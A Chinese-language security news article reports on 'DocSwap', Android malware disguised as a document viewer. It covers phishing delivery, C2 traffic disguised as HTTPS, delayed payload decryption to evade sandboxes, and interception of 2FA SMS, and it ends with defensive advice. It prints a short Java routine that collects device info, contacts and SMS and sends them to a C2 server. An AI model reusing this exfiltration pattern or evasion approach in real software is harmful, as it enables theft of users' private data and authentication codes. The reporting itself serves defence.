一场名为 “DocSwap” 的复杂恶意软件攻击活动浮出水面,它伪装成一款合法的文档安全与查看应用程序,将全球的Android 用户作为攻击目标。

该恶意软件运用社会工程策略,诱骗用户安装看似是生产力工具的程序,实则在受害者设备上悄然建立持久存在,并窃取敏感信息。

最初的感染通常通过网络钓鱼邮件或受攻击的网站进行,这些邮件和网站将这款假的文档查看器宣传为安全打开 PDF 和办公文件的解决方案。

安装后,DocSwap 会请求广泛的权限,包括访问联系人、存储以及短信功能。

S2W 安全分析师指出,一旦安装,该恶意软件会使用加密协议与命令控制服务器建立连接,以此绕过标准检测方法。他们的分析显示,在过去三周内,亚洲、欧洲和北美的感染数量大幅激增。

该恶意软件采用了复杂的混淆技术来隐藏其恶意代码。当应用程序被打开时,它确实会展示文档查看功能,同时在后台执行其有效载荷,这使得普通用户很难检测到异常。

DocSwap 的核心功能依赖于一个原生库,该库执行以下代码:

private void exfiltrateData() {

String deviceInfo = getDeviceInfo();

String contactsList = getContacts();

String smsData = getMessages();

new AsyncTask() {

@Override

protected Void doInBackground(Void… params) {

sendToC2Server(encryptData(deviceInfo + contactsList + smsData));

return null;

}

}.execute();}

攻击分析

该恶意软件采用多阶段感染过程,起始于一个释放器组件。这个初始有效载荷看似无害,但包含一个加密的有效载荷,该载荷会在预定延迟后解密。

这种技术有助于躲避安全研究人员常用的沙盒分析和动态扫描工具。

对网络流量的分析表明,DocSwap 主要与位于东欧和东南亚的服务器通信,使用一种模仿合法 HTTPS 流量的自定义协议。

DocSwap 最令人担忧的方面是它能够拦截并转发身份验证短信,这可能危及双因素身份验证。

安全专家建议立即卸载任何可疑的文档查看应用程序,并使用可靠的杀毒软件对设备进行全面扫描。用户还应启用谷歌应用商店保护功能,并避免从未知来源安装应用程序。

 

 

文章原文链接:https://www.anquanke.com/post/id/305179